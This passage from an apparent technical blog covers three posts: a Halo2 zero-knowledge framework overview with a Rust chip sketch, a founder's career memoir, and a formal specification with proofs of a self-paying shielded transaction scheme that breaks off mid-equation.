1. **Custom gates.** A polynomial identity that must hold on every row, possibly gated by a selector column. `q_mul · (a · b - c) = 0` is the canonical example: when `q_mul = 1`, the constraint forces `a · b = c`; when `q_mul = 0`, the constraint vanishes.
2. **Permutation arguments.** Cells that should be equal across rows or columns are wired into a permutation. This is what gives you "this output of gate A is the input to gate B" without paying the cost of an extra constraint per copy.
3. **Lookup arguments.** A cell must be in some pre-declared table. This is what makes range checks ($x < 2^{16}$) cost ~1 row per check instead of 16, and what makes XOR / S-box / SHA tables tractable inside a SNARK.

The novelty in 2020 wasn't any single one of those — PLONK had given us custom gates and permutations, plookup had given us lookups — but the *combination*, the *user-facing API* (chips, regions, layouters), and the *recursion-friendly proof system* underneath it.

The arithmetisation is so durable that every Halo2 fork in 2026 still uses the same `Circuit` trait, the same `Layouter`, the same `Region`, the same `Selector`. If you wrote a Halo2 chip in 2021, it compiles in 2026 against PSE-Halo2 with one or two trait-bound tweaks. That's an extraordinary track record for a 6-year-old framework.
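The `q_mul · (a · b - c) = 0` identity is worth evaluating by hand once. A minimal sketch over a toy prime field, assuming nothing from halo2 itself (the modulus and function names are stand-ins):

```rust
// Toy evaluation of the multiplier gate over a small prime field.
// This is the polynomial identity itself, not halo2 API code.
const P: u64 = 65_537; // toy prime, stand-in for a real SNARK field

/// q * (a * b - c) over F_P. Must evaluate to 0 on every row.
fn mul_gate(q: u64, a: u64, b: u64, c: u64) -> u64 {
    let ab = (a * b) % P;
    let diff = (ab + P - c % P) % P; // a*b - c, kept non-negative mod P
    (q * diff) % P
}

fn main() {
    // Selector on: the constraint is live, so a*b must equal c.
    assert_eq!(mul_gate(1, 6, 7, 42), 0); // 6*7 = 42: satisfied row
    assert_ne!(mul_gate(1, 6, 7, 41), 0); // violated row: nonzero residue
    // Selector off: the gate vanishes whatever the cells hold.
    assert_eq!(mul_gate(0, 6, 7, 999), 0);
    println!("gate identity holds exactly where q_mul = 1");
}
```

The selector multiplication is the entire on/off mechanism: rows where `q_mul = 0` contribute nothing, which is what lets many chips share the same columns.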
## What evolved: from IPA to KZG

The original Zcash Halo2 used **IPA** (inner-product argument) over the Pasta cycle of curves (Pallas + Vesta). That choice was deliberate: IPA needs *no trusted setup*, and the Pasta cycle let Zcash do recursion without pairings. Beautiful in theory; expensive in practice. IPA proofs are logarithmic in circuit size — kilobytes in practice — and verification is linear-time, dominated by a large multi-scalar multiplication (which is exactly the cost Halo's accumulation trick amortises away).

The dominant 2026 fork — Privacy Scaling Explorations' [`privacy-scaling-explorations/halo2`](https://github.com/privacy-scaling-explorations/halo2) — replaced IPA with **KZG** over BN254. The trade-off:

- **You give up:** trustless setup. KZG needs a Powers-of-Tau ceremony.
- **You get:** constant-size proofs (~600 bytes), pairing-based verification that's an order of magnitude cheaper, and Solidity verifier compatibility — which is the single feature that turned Halo2 from "Zcash internal tool" into "the EVM rollup substrate".

This is the trade-off every serious ZK design makes once. (The same trade-off shows up in [Plonky3, the small-fast-cheap revolution](/blog/plonky3_small_fast_cheap/) on a different axis.) Trusted setup is back on the table in 2026 because the Ethereum KZG ceremony — 140,000+ participants — is *good enough* for the threat model most rollups operate under. See [On the death of the trusted setup](/blog/on_the_death_of_the_trusted_setup/) for the argument.
<Mermaid chart={`flowchart TD
  Z[zcash/halo2] --> I[IPA + Pasta curves]
  Z --> P[PLONKish + lookups + chips]
  P --> P1[Custom gates]
  P --> P2[Permutations]
  P --> P3[Lookups]
  Z --> F[Forks 2022-2026]
  F --> PSE[PSE Halo2 - KZG over BN254]
  F --> AX[Axiom fork]
  F --> SCROLL[Scroll fork]
  F --> ZK[zkEVM forks: Taiko, Linea]
  PSE --> SOL[Solidity verifier compat]
  PSE --> M[Maintenance mode Jan 2025]
  AX --> ACTIVE[Active 2026]
  classDef ship fill:#0a4014,stroke:#4ade80,color:#fff
  classDef warn fill:#3a2a0a,stroke:#facc15,color:#fff
  class SOL ship
  class ACTIVE ship
  class M warn
`}/>

## The fork landscape in 2026

| Fork | Backend | Status | What it's for |
|---|---|---|---|
| `zcash/halo2` | IPA, Pasta | Maintenance / archival | The reference, where the model originated |
| `privacy-scaling-explorations/halo2` | KZG, BN254 | Maintenance since Jan 2025 | The EVM-compatible workhorse |
| `axiom-crypto/halo2-axiom` | KZG, BN254 | Active | The PSE successor for new features |
| Scroll's `halo2` | KZG, BN254 | Active inside Scroll | zkEVM-tuned, custom gates for EVM ops |
| `halo2-base` (in `axiom-crypto/halo2-lib`) | KZG, BN254 | Active | Higher-level chip-authoring API on top of PSE / Axiom |

The headline event of 2025 was that PSE-Halo2 went into maintenance and the community migrated to Axiom's fork as the upstream for new feature work. Existing deployments did not move — the API surface is identical and PSE-Halo2 still receives security backports — but the energy is on `axiom-crypto/halo2-axiom` and on `halo2-base` for ergonomic chip authoring.

## What evolved: gadgets, lookups, and the Lagrange-form witness

Three quieter shifts since 2022 actually changed how circuits are written:

**Gadget libraries got serious.** The original Halo2 shipped with `halo2_gadgets::poseidon` and not much else.
By 2026 the [`halo2-base`](https://github.com/axiom-crypto/halo2-lib) and [`halo2-axiom`](https://github.com/axiom-crypto/halo2-axiom) crates ship range checks, ECC, Poseidon, Keccak, RSA, ECDSA, BN254 pairing, and a battery of lookup tables shared across circuits. The "I have to hand-roll a SHA chip" era is over for 90% of use cases.

**Lookups became table-shareable.** Halo2's original lookup design assumed each circuit declared its own tables. With circuits hitting 10 million rows, *table reuse* across sub-circuits became necessary. Both Axiom and PSE landed APIs for declaring a lookup table once and binding it across regions. The constraint-count savings on big circuits are 30–50%.

**Lagrange-form witness commitment.** The witness used to be committed in coefficient form, requiring an NTT before commitment. Modern forks commit in *Lagrange* form (point-value), saving an NTT per commitment. On large circuits this is a 15–20% prover-time win — the kind of thing that doesn't show up in marketing copy and matters enormously when you're proving a million constraints.

## A skeleton chip you can read in 30 seconds

Halo2 chips look intimidating. They are not. The shape is: declare the columns you need, declare the constraints in `configure`, and use them in `synthesize`. Below is a contrived multiplier chip — the smallest Halo2 chip that does anything — written against the kind of trait surface every fork shares.

{`// Sketch of a Halo2 multiplier chip — c = a * b per row.
// Will not compile standalone; depends on halo2_proofs traits.
// Treat as the structural shape, not a runnable program.

use std::marker::PhantomData;

// Stand-in types so the file is self-documenting.
struct Column<C>(PhantomData<C>);
struct Selector;
struct Cell<F>(PhantomData<F>);
trait Field {}

// === The chip's column layout ===
struct MulConfig {
    a: Column<()>,    // advice (witness)
    b: Column<()>,    // advice
    c: Column<()>,    // advice
    q_mul: Selector,  // selector — turns the gate on or off
}

struct MulChip<F: Field> {
    config: MulConfig,
    _marker: PhantomData<F>,
}

impl<F: Field> MulChip<F> {
    // configure() is called once at circuit-definition time. It declares
    // which columns are used and what custom gates fire on which selectors.
    pub fn configure(/* meta: ConstraintSystem */) -> MulConfig {
        // Pseudocode for the constraint system:
        //
        // meta.create_gate("multiplier", |meta| {
        //     let a = meta.query_advice(a, Rotation::cur());
        //     let b = meta.query_advice(b, Rotation::cur());
        //     let c = meta.query_advice(c, Rotation::cur());
        //     let q = meta.query_selector(q_mul);
        //     vec![ q * (a * b - c) ]
        // });
        //
        // The vec![] returned must evaluate to 0 on every row where q_mul = 1.
        //
        // That single line — q * (a * b - c) — is the ENTIRE arithmetisation
        // of the multiplier. Permutation arguments handle copy-equality;
        // lookup arguments handle range checks; everything else is layered
        // on top of this primitive.
        unimplemented!("see halo2_proofs::plonk::ConstraintSystem")
    }

    // synthesize() is called once per proof. It assigns concrete values
    // to advice cells.
    pub fn assign_mul(&self, /* layouter, */ a_val: F, b_val: F) -> Cell<F> {
        // Pseudocode:
        //
        // layouter.assign_region(|| "mul", |mut region| {
        //     self.config.q_mul.enable(&mut region, 0)?;
        //     region.assign_advice(|| "a", self.config.a, 0, || Ok(a_val))?;
        //     region.assign_advice(|| "b", self.config.b, 0, || Ok(b_val))?;
        //     let c_val = a_val * b_val;
        //     region.assign_advice(|| "c", self.config.c, 0, || Ok(c_val))
        // })
        unimplemented!("see halo2_proofs::circuit::Layouter")
    }
}

fn main() {
    // The shape above generalises to every chip in halo2-axiom and
    // halo2-base. Configure once; assign per proof; gate constraints with
    // selectors so chips can coexist on the same columns.
    println!("see axiom-crypto/halo2-lib for production examples");
}
`}

## The proving-time tradeoff in 2026

## When to actually pick Halo2 in 2026

The honest 2026 answer:

- **Pick Halo2 (Axiom fork) when** your target is the EVM, your circuit is dominated by lookups (range checks, table-driven hash functions, RLC-heavy state-transition circuits), and you want a battle-tested gadget library.
- **Don't pick Halo2 when** your target is a non-EVM L1 (Solana, Aptos) where Solidity verifiers don't help, when your circuit is small (under ~5,000 constraints — Groth16 is faster per shot), or when you need transparent setup (use Plonky3 / RISC0).

## What I'd build differently if I were Halo2 in 2027

Three things, in order of how much I'd actually use them:

1. **Native folding integration.** Halo2's original recursion path (IPA + Pasta cycle) was elegant but slow. A folding scheme — Nova, ProtoStar, HyperNova — bolted onto KZG-Halo2 would unlock zkVMs and batch proving without a rewrite. Several teams are working on this; nothing is in main yet.
2. **A real type system for chips.** `Cell` is structurally typed by row/column position. There's no compile-time guarantee that "this cell holds a u8" or "this cell holds a Boolean" without re-asserting it inside every chip. A phantom-type-driven cell typing would catch a class of audit findings before the auditor ever opens the file.
3. **A standardised lookup-table registry.** Range checks, byte tables, S-box tables — every fork ships its own. A shared `halo2-tables` crate, content-addressed and reusable, would prevent the "every circuit re-declares the same range-16 table" anti-pattern.

I expect (1) within a year and (2)/(3) never. Halo2 is in the *durable* phase of its life — the kind of framework you build *on*, not *into*.
## Further reading

- [The Halo2 Book](https://zcash.github.io/halo2/) — Zcash's canonical guide to the original framework
- [Halo: Recursive Proof Composition without a Trusted Setup](https://eprint.iacr.org/2019/1021) — Bowe, Grigg, Hopwood (2019, last revised Feb 2020) — the paper Halo2 names itself after
- [PLONK: Permutations over Lagrange-bases for Oecumenical Noninteractive arguments of Knowledge](https://eprint.iacr.org/2019/953) — Gabizon, Williamson, Ciobotaru (2019) — the underlying arithmetisation
- [`privacy-scaling-explorations/halo2`](https://github.com/privacy-scaling-explorations/halo2) — the KZG fork that drove EVM adoption
- [`axiom-crypto/halo2-lib`](https://github.com/axiom-crypto/halo2-lib) — the gadget library to build on in 2026
- [Circom, by example](/blog/circom_by_example/) — the R1CS sister-substrate; useful comparison for arithmetisation cost models
- [On the death of the trusted setup](/blog/on_the_death_of_the_trusted_setup/) — why KZG is fine even in a transparent-setup era

---

# From sailor to CEO in three acts

Canonical: https://blog.skill-issue.dev/blog/sailor_to_ceo_three_acts/
Description: A short memoir of a strange decade — Navy reactor compartments, a bitcoin mine, ConsenSys-USAA-PMG, and the arc that ended at Zera Labs. The interesting question is not how I got here. It is where everyone else is going.
Published: 2026-05-01T08:00:00.000Z
Tags: career, narrative, navy, foundry, consensys, zera, memoir

This blog has accumulated, at this point, several long-form posts covering individual chapters of how I got from a Navy reactor compartment to running Zera Labs. The [Navy origin post](/blog/nuclear_reactors_taught_me_to_ship/). The [Foundry post](/blog/what_running_a_bitcoin_mine_taught_me/). The [founding letter](/blog/why_i_started_zera_labs/). The [CEO-still-shipping post](/blog/being_ceo_and_still_shipping_code/).

This is the shorter post that exists because *people who don't read the long posts* still ask the question.
*How did the Navy guy end up building a ZK SDK?* The version that fits on LinkedIn. Three acts. One arc. I'll keep it under two thousand words.

## Act one: the watch

I came up as a Nuclear Electronics Technician in the US Navy. The Navy nuclear pipeline is — there is no nice way to say this — an unreasonable amount of school. You go through a screening that washes out most of the people who applied. Then you go through Nuclear Power School, which is twenty-six weeks of physics, reactor theory, thermo, fluids, and mathematics at a pace that is calibrated to break you exactly enough to find out whether you bend back. Then you go through prototype, where you actually run a real reactor, in a real plant, for thousands of hours of supervised watchstanding. Then you go to a hull, which is when the actual job starts.

Along the way you are taught — not as a soft skill, but as a hard skill — that the panel does not lie, the procedure is the contract, and the most dangerous person on the watchstation is the one who decides the indications are *probably* fine.

I got out with a stack of qualifications, a security clearance whose paperwork I am still slightly anxious about, and a bone-deep instinct for how safety-critical engineering is actually done. That instinct does not show up on a resume. You only see it when the system is on fire, and even then you only see it as the absence of panic.

If you want the long version: *[Nuclear reactors taught me to ship software](/blog/nuclear_reactors_taught_me_to_ship/).*

## Act two: the chips and the code

Out of the Navy, I took an unexpected detour through industrial Bitcoin mining at **Foundry Digital**. (`TODO: Dax confirm length of stint and exact role title — keeping the short version short here.`) ASICs in racks. Megawatts of power. Heat going out by every method physics allows. The unit economics live on a five-input spreadsheet, and the spreadsheet does not lie either.
The thing nobody tells you about working in mining operations is that *it is the closest thing the modern economy has to a reactor compartment*. The discipline transfers exactly. The watchstanding is the same. The brutal physical immediacy of a ten-thousand-amp electrical bus is a familiar object to a former reactor electronics tech.

So I did a chapter, learned what I needed to learn about the depreciation curve and the cost of an electron, and moved on. If you want the long version: *[What running a Bitcoin mine taught me about cloud margins](/blog/what_running_a_bitcoin_mine_taught_me/).*

After Foundry I went where most former-military, vaguely-technical thirty-somethings end up: into software. **PMG** first (`TODO: Dax confirm`). Then **USAA** (`TODO: Dax confirm`). Then **ConsenSys**, which is where the Web3 part of the story started — open-source work across the product surface, mentoring junior engineers, and starting to speak publicly at *Permissionless* and *EthGlobal* on developer experience and supply-chain risk.

The supply-chain risk thread is the one that became the [Rusty Pipes series](/blog/rusty_pipes/) on this blog — a research thread on Rust binaries injected into npm packages, which is the kind of attack that is funny on a slide and very much not funny in a customer's CI. The series is the longest-running thing I've written and the thing I am most consistently invited to talk about. It also lined up, in a way I did not plan, with the technical posture I'd later need at Zera Labs: *the moment your dependency surface is non-trivial, the registry becomes your threat model, not your library.*

In act two I learned to ship software the way the modern industry ships it. Continuous deployment. Cloud-native everything. PR review culture, sometimes good, sometimes bad. I learned what a senior IC actually does, then I learned what a staff engineer actually does, then I started to notice that the ceiling was not where the interesting problems were.
## Act three: the company

The third act starts with three things being true at the same time, in the same year. ZK got fast enough to be boring. Solana got cheap enough to make tokenisation a *naming* decision instead of a budgeting decision. AI agents stopped being demos and started being tools that needed to interact with money.

Sitting at the intersection of those three things, I incorporated **Zera Labs**. The technical surface — visible in [github.com/Dax911](https://github.com/Dax911) — is the [zera-sdk](https://github.com/Dax911/zera-sdk) (Solana-native ZK SDK with a Rust core), [zera-wallet-demo](https://github.com/Dax911/zera-wallet-demo) (Tauri 2 with Groth16 in WASM), [z_trade](https://github.com/Dax911/z_trade) (zeraswap — first compressed-token AMM on Solana), [zera_med_demo](https://github.com/Dax911/zera_med_demo) (a ZK-FHIR gateway because someone asked us to prove it works for things other than crypto bros), and a public Zera Design System we use across the product. Plus an MCP server for AI agents to call any of it.

We are small (`TODO: Dax confirm headcount when comfortable disclosing`), the work is technically dense, and the schedule is short. If you want the long version: *[Why I started Zera Labs](/blog/why_i_started_zera_labs/)*. If you want the inside-the-week version: *[Being CEO and still shipping code](/blog/being_ceo_and_still_shipping_code/)*.

## What the arc actually is

Looking at the three acts side by side, the arc is not "Navy guy gets into crypto." That is the LinkedIn-recruiter version. The actual arc is something narrower:

> Each chapter forced me to take seriously the gap between *the system is correct* and *I have correctly observed that the system is correct.*

In the Navy that gap is closed by watchstanding, two-person verification, and casualty drills. In mining it is closed by telemetry, redundant temperature sensors, and on-call.
In software at scale (PMG → USAA → ConsenSys) it is closed by tests, code review, and post-mortems. In ZK it is closed by a Groth16 proof — a piece of math that *is* the closure of the gap.

The whole story, condensed, is that I kept moving up the stack of "ways to know that the system is correct," and each step gave me a little more leverage than the last. The reactor watchstander's tools are slow, expensive, and limited to a single plant. The miner's tools are faster and parallel, but only over a single workload. The senior IC's tools are general-purpose but soft — they assume an honest reviewer. The cryptographic tools at the end of the arc are general-purpose, fast, *and* don't assume an honest reviewer. They are, in a real sense, what every prior chapter was reaching for.

If I had to pin the arc to one sentence I'd say: *I have spent fifteen years getting better at proving that systems are doing what they claim to be doing*, and the most productive place to do that work, today, is at a company whose entire surface is about producing those proofs.

## What I'd tell my younger selves

Three notes to three different versions of me — because I find this is the most useful summary for people whose careers are a few chapters earlier than mine.

To the kid in the reactor compartment: the discipline you are absorbing is the most valuable thing you are going to learn, and you will not realise this until you have been out for five years. Don't lose the watchstanding habits. Don't soften the procedure-in-hand instinct. Find a civilian career where they still apply.

To the operator at the mining site: pay attention to the unit economics. The five-input spreadsheet is a model that generalises beyond mining. Carry it with you. Whatever business you eventually find yourself in, you will be able to think about it more clearly than the people around you because you have seen what real unit economics actually look like.
To the senior IC at ConsenSys: the Rusty Pipes work is the start of a research thread, not the end of one. Don't drop it after the first post. The supply-chain question is going to be one of the defining infrastructure problems of the next decade, and you are early.

To present me: don't get cocky.

## And to the reader

That's how I got here. The interesting question, though, is not how I got here. It is where everyone else is going.

If you came up the same way — Navy, military, technical — and you are thinking about the civilian transition, my email is at the bottom of every page. Reach out. The civilian-tech industry will tell you a lot of things about your discipline, almost none of them flattering, almost none of them correct. The reactor instincts are a superpower in a software org that has lost them. Bring them with you.

If you are a senior IC who is wondering whether to keep going up the staff ladder or jump sideways into a founder seat, I hope the [CEO-still-shipping post](/blog/being_ceo_and_still_shipping_code/) is useful. The math is not as bad as the canon makes it sound.

If you are at the third act yourself, building cryptographic infrastructure or anything adjacent, I want to know. The ecosystem is small enough that we should know each other.

And if you are at the very beginning — looking at a screening package, or a Navy recruiter, or a dev bootcamp acceptance, or a first software job — pick the chapter that gives you the deepest *forcing function*. Pick the chapter that demands the most discipline up front. The discipline is the thing that compounds. The technology is the thing that changes.

That's the LinkedIn version. The longer versions are linked above. Thanks for reading.

---

# SPST: a self-paying shielded transaction model

Canonical: https://blog.skill-issue.dev/blog/spst_self_paying_shielded_transactions/

Description: First construction in F_RP.
The SPST relation, balance conservation under DLOG, double-spend resistance under collision-resistant PRF, unlinkability under DDH, simulation-extractable non-malleability.

Published: 2026-04-30T17:30:00.000Z

Tags: zk, cryptography, pedersen, groth16, zcash, solana, phd

import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

In the [previous post](/blog/the_fee_paradox/) I argued that on account-model chains the fee paradox is what forces relayer dependence. The cleanest resolution — Approach A — extracts the transaction fee from inside the ZK proof itself.

This post specifies that resolution. The construction is called **SPST** (Self-Paying Shielded Transactions). It is the foundation that PPST, TAB, and UPEE build on. It also stands alone as a complete protocol for private value transfer with self-paying fees — the Solana analogue to Zcash's Sapling spend description, but adapted to a smart-contract environment.

## The setting

Work over a prime-order elliptic curve group $\mathbb{G}$ of order $p$ with two independent generators $g, h \in \mathbb{G}$ for which no party knows $\log_g h$. Let $\mathbb{F}_p$ denote the scalar field. We use:

- **Poseidon** as the SNARK-friendly hash (width $t = 5$, HADES rounds $R_F = 8$ full + $R_P = 57$ partial, S-box $x^5$, ~324 R1CS constraints per 2-to-1 compression).
- **PRF** keyed by $sk \in \mathbb{F}_p$, instantiated as a domain-separated Poseidon evaluation.
- **Groth16** over BN254 as the on-chain verifier (alt_bn128 syscalls on Solana).
- **Indexed Merkle Trees** for nullifier non-membership (depth-32 over 254-bit values; ~10,948 R1CS constraints per non-membership proof, vs 82,296 for naive sparse Merkle).
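Those two non-membership figures are worth sanity-checking. The back-of-envelope accounting below, in TypeScript, reproduces both from the ~324-constraints-per-compression figure quoted above; the exact split (33 hashes plus a 256-bit decomposition for the indexed proof) is my own plausible breakdown, not necessarily the paper's.

```typescript
// Constraint accounting for nullifier non-membership proofs, using the
// post's ~324 R1CS constraints per Poseidon 2-to-1 compression. The
// breakdowns are one plausible accounting that reproduces the quoted
// totals; the real circuits may split costs differently.
const POSEIDON_2TO1 = 324;

// Naive sparse Merkle tree keyed by the 254-bit value: one hash per key bit.
const naiveSparse = 254 * POSEIDON_2TO1;

// Indexed Merkle tree: authenticate one "low leaf" (leaf hash plus a
// depth-32 path, i.e. 33 hashes) plus a 256-bit decomposition for the
// two range comparisons against the leaf's value and next-value.
const indexed = 33 * POSEIDON_2TO1 + 256;

console.log({ naiveSparse, indexed });          // { naiveSparse: 82296, indexed: 10948 }
console.log((naiveSparse / indexed).toFixed(1)); // ~7.5x fewer constraints
```

The ~7.5× gap is the entire argument for the indexed tree: non-membership cost scales with the tree's *depth*, not with the *bit-width* of the values it indexes.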
## Definitions

**Definition 3.1 (Shielded Note).** A *shielded note* is a tuple

$$
\mathsf{note} = (\mathsf{pk}, v, \rho, r)
$$

where $\mathsf{pk} = \mathsf{PRF}_{sk}(0)$ is the owner's public spending key, $v \in \{0, \ldots, 2^{64}-1\}$ is the note value, $\rho \in \mathbb{F}_p$ is unique per-note serial randomness, and $r \in \mathbb{F}_p$ is the commitment trapdoor.

**Definition 3.2 (Note Commitment).**

$$
\mathsf{cm} \;=\; \mathsf{Poseidon}(\mathsf{pk},\, v,\, \rho,\, r) \;\in\; \mathbb{F}_p.
$$

Note commitments are appended as leaves to a global Merkle tree $\mathcal{T}$ of depth $d = 32$ (capacity $2^{32}$ notes). The Merkle root at any epoch is $\mathsf{rt}$.

**Definition 3.3 (Nullifier).**

$$
\mathsf{nf} \;=\; \mathsf{PRF}_{sk}(\rho) \;=\; \mathsf{Poseidon}(sk, \rho).
$$

Upon spending, $\mathsf{nf}$ is published to a global nullifier set $\mathcal{N}$. Double-spending is prevented by rejecting any transaction whose $\mathsf{nf}$ already lives in $\mathcal{N}$.

**Definition 3.4 (SPST Transaction).** With $n$ inputs and $m$ outputs:

$$
\mathsf{tx} \;=\; \bigl(\, \{\mathsf{nf}_i\}_{i=1}^{n},\; \{\mathsf{cm}_j\}_{j=1}^{m},\; \mathsf{rt},\; f,\; \pi \,\bigr)
$$

where $f \in \{0, \ldots, 2^{64}-1\}$ is the public fee and $\pi$ is a Groth16 proof of the SPST relation. The validator accepts iff (i) $\pi$ verifies, (ii) $\mathsf{rt}$ is a recent root, (iii) every $\mathsf{nf}_i \notin \mathcal{N}$, and (iv) $f \geq f_{\min}$.

## The SPST relation

The relation $\mathcal{R}_{\mathsf{SPST}}$ is the set of $(x, w)$ pairs:

**Public instance** $x = \bigl(\{\mathsf{nf}_i\}, \{\mathsf{cm}_j\}, \mathsf{rt}, f\bigr)$.

**Private witness** $w = \bigl(\{(\mathsf{note}_i, \mathsf{path}_i, sk_i)\}, \{\mathsf{note}'_j\}\bigr)$.
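Before the constraint list, the plumbing of Definitions 3.1–3.4 can be sketched in a few lines of TypeScript. A cheap modular mixing function stands in for Poseidon (it is not collision resistant; illustration only), and the Merkle tree and the proof itself are elided.

```typescript
// Toy note lifecycle: derive pk, commit to a note, spend it once.
const P = 2n ** 61n - 1n; // toy field, stand-in for the ~2^254 scalar field
const H = (...xs: bigint[]) =>
  xs.reduce((acc, x) => (acc * 1_000_003n + x) % P, 7n); // NOT Poseidon
const prf = (sk: bigint, x: bigint) => H(sk, x); // domain-separated in the real scheme

const sk = 42n;
const pk = prf(sk, 0n);                          // Def 3.1: pk = PRF_sk(0)
const note = { pk, v: 500n, rho: 11n, r: 99n };
const cm = H(note.pk, note.v, note.rho, note.r); // Def 3.2: cm = Poseidon(pk, v, rho, r)

// Def 3.3: the nullifier is bound to (sk, rho), so the same note always
// produces the same nullifier, and the global set rejects a second spend.
const nullifierSet = new Set<bigint>();
const nf = prf(sk, note.rho);
const spend = (n: bigint): boolean => {
  if (nullifierSet.has(n)) return false; // double spend: rejected
  nullifierSet.add(n);
  return true;
};

console.log(spend(nf)); // true  - first spend accepted
console.log(spend(nf)); // false - same nullifier rejected
```

In the real protocol the validator never sees `sk`, `note`, or the link between `cm` and `nf`; the circuit below proves those relationships hold without revealing them.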
Eight constraints, all enforced by the circuit:

| # | Name | Constraint |
|---|------|-----------|
| C1 | Spending key validity | $\mathsf{pk}_i = \mathsf{PRF}_{sk_i}(0)$ |
| C2 | Nullifier correctness | $\mathsf{nf}_i = \mathsf{PRF}_{sk_i}(\rho_i)$ |
| C3 | Input commitment well-formedness | $\mathsf{cm}^{(\mathsf{in})}_i = \mathsf{Poseidon}(\mathsf{pk}_i, v_i, \rho_i, r_i)$ |
| C4 | Merkle membership | $\mathsf{MerkleVerify}(\mathsf{rt}, \mathsf{cm}^{(\mathsf{in})}_i, \mathsf{path}_i) = 1$ |
| C5 | Output commitment well-formedness | $\mathsf{cm}_j = \mathsf{Poseidon}(\mathsf{pk}'_j, v'_j, \rho'_j, r'_j)$ |
| **C6** | **Value conservation with fee** | $\sum_i v_i = \sum_j v'_j + f$ |
| C7 | Non-negative output values | $v'_j \in \{0, \ldots, 2^{64}-1\}$ (bit decomposition) |
| C8 | Non-negative fee | $f \in \{0, \ldots, 2^{64}-1\}$ |

C6 is the load-bearing constraint. It is what makes the transaction self-paying: the prover can only produce a valid proof if the input notes' values sum to exactly the output values plus the fee.

## The self-paying property (Theorem 3.1)

**Theorem.** Let $\mathsf{tx} = (\{\mathsf{nf}_i\}, \{\mathsf{cm}_j\}, \mathsf{rt}, f, \pi)$ be a valid SPST transaction. Then:

1. The fee $f$ is funded entirely from consumed shielded notes.
2. No external account, relayer, or gas sponsor is required.
3. Validators extract $f$ as inclusion compensation without learning the private inputs/outputs beyond $f$ itself and the validity of $\pi$.

**Proof sketch.** (1) follows directly from C6. (2) follows because $\mathsf{tx}$ is a self-contained data structure that any party can broadcast; the on-chain verifier decrements the privacy program's lamport reserve by $f$ and credits the validator. (3) is the perfect zero-knowledge property of Groth16: the validator sees $f$ as a public input but learns nothing about $v_i$ or $v'_j$. The full proof is in §3.1.3 of the paper.

The takeaway: **on Solana, the privacy program's PDA holds a reserve.
Each shield deposit increments it. Each SPST transaction's proof authorises the validator to take $f$ from it.** Replenishment is automatic.

## Theorem 3.2 — Balance / value conservation

**Statement.** No PPT adversary can produce a valid SPST transaction that creates value (i.e., one for which $\sum_j v'_j + f > \sum_i v_i$) except with negligible probability.

The proof gives two complementary arguments — one from the SNARK's knowledge soundness, one from an independent Pedersen commitment cross-check that provides defense in depth.

### Argument 1 (SNARK soundness)

C6 enforces $\sum_i v_i = \sum_j v'_j + f$ over $\mathbb{F}_p$. C7 and C8 enforce $v'_j, f \in [0, 2^{64})$. With at most $n \leq 2^{16}$ inputs each bounded by $2^{64}$, $\sum_i v_i < 2^{80} \ll p \approx 2^{254}$ — so field arithmetic faithfully represents integer arithmetic and no modular wraparound is possible. By Groth16 knowledge soundness in the AGM, an extractor $\mathcal{E}$ can recover the witness $w^*$ satisfying all constraints C1–C8. C6 in the extracted witness gives $\sum_i v_i = \sum_j v'_j + f$ as an integer equation. Contradiction with the assumed inflation.

### Argument 2 (Pedersen cross-check)

As defense in depth, attach Pedersen value commitments to each note. With $C_{\mathsf{in},i} = v_i \cdot g + r^{(\mathsf{vc})}_i \cdot h$ and $C_{\mathsf{out},j} = v'_j \cdot g + r^{(\mathsf{vc})}_j \cdot h$, the verifier checks

$$
\sum_i C_{\mathsf{in},i} \;=\; \sum_j C_{\mathsf{out},j} \;+\; f \cdot g \;+\; r_\Delta \cdot h
$$

where $r_\Delta = \sum_i r^{(\mathsf{vc})}_i - \sum_j r^{(\mathsf{vc})}_j$. Suppose an adversary passes this check but with $\sum_j v'_j + f \neq \sum_i v_i$. Let $\delta = \sum_i v_i - \sum_j v'_j - f \neq 0$. Then $\delta \cdot g = r'_\Delta \cdot h$ for some $r'_\Delta$, which yields $\log_g h = \delta / r'_\Delta$ — contradicting DLOG.
∎

## Theorem 3.3 — Double-spend resistance

**Game.** $\mathcal{A}$ may adaptively deposit and spend; wins if it produces two accepted transactions consuming the same note $\mathsf{note}^*$.

**Cases.**

- **Case 1:** The two transactions publish the same nullifier. Rejected by the protocol's nullifier-set check.
- **Case 2:** They publish different nullifiers $\mathsf{nf} \neq \mathsf{nf}'$ but consume the same note. By C4 both proofs authenticate the same commitment $\mathsf{cm}^*$. By C1 we have $\mathsf{pk}^* = \mathsf{PRF}_{sk^*}(0) = \mathsf{PRF}_{sk'}(0)$.
  - If $sk^* = sk'$, then $\mathsf{nf} = \mathsf{nf}'$. Contradiction.
  - If $sk^* \neq sk'$, then $\mathsf{Poseidon}(sk^*, 0) = \mathsf{Poseidon}(sk', 0)$ — a collision in Poseidon. Reduces to collision resistance.

Both cases reach a contradiction. ∎

## Theorem 3.4 — Transaction unlinkability

**Statement.** Under perfect zero-knowledge of Groth16 and computational hiding of Pedersen commitments under DDH, the SPST scheme satisfies transaction unlinkability: no PPT adversary can determine which input notes fund which output notes with non-negligible advantage.

**Proof structure.** Hybrid argument:

- **Hybrid 0**: real game.
- **Hybrid 1**: replace all Groth16 proofs with simulated proofs. By perfect ZK of Groth16, indistinguishable.
- **Hybrid 2**: in the simulated view, the multisets of nullifiers, commitments, roots, fees are identical for both branchings of the challenge. The fee is identical by construction. Each $\mathsf{cm}_j = \mathsf{Poseidon}(\mathsf{pk}'_j, v'_j, \rho'_j, r'_j)$ with fresh random $r'_j$ is computationally indistinguishable from a uniform field element. Each nullifier $\mathsf{nf}_i = \mathsf{PRF}_{sk_i}(\rho_i)$ with unique $\rho_i$ is pseudorandom. The Pedersen value commitments are computationally hiding under DDH.

Result: $\mathsf{Adv}_{\mathcal{A}} \leq \mathsf{negl}(\lambda)$.
∎

## Theorem 3.5 — Non-malleability

**Statement.** No PPT adversary can take a valid SPST transaction and produce a *distinct* valid transaction with altered public inputs (e.g., a different fee), except with negligible probability.

**Proof.** Relies on the **simulation-extractability** of Groth16 in the Random Oracle Model — the Bowe-Gabizon construction (2019), refined by Baghery-Pindado-Ràfols (2023). An adversary mauling the proof to alter $f$ would need to extract a witness with a *different* $f'$ satisfying C6, but C6 plus the unchanged input commitments and output commitments uniquely determines $f$. Contradiction. ∎

## Circuit complexity

For an SPST circuit with $n$ inputs and $m$ outputs:

$$
C_{\mathsf{total}} \;\approx\; 11{,}500 \cdot n \;+\; 452 \cdot m \;+\; 64.
$$

A canonical 2-in / 2-out transaction:

$$
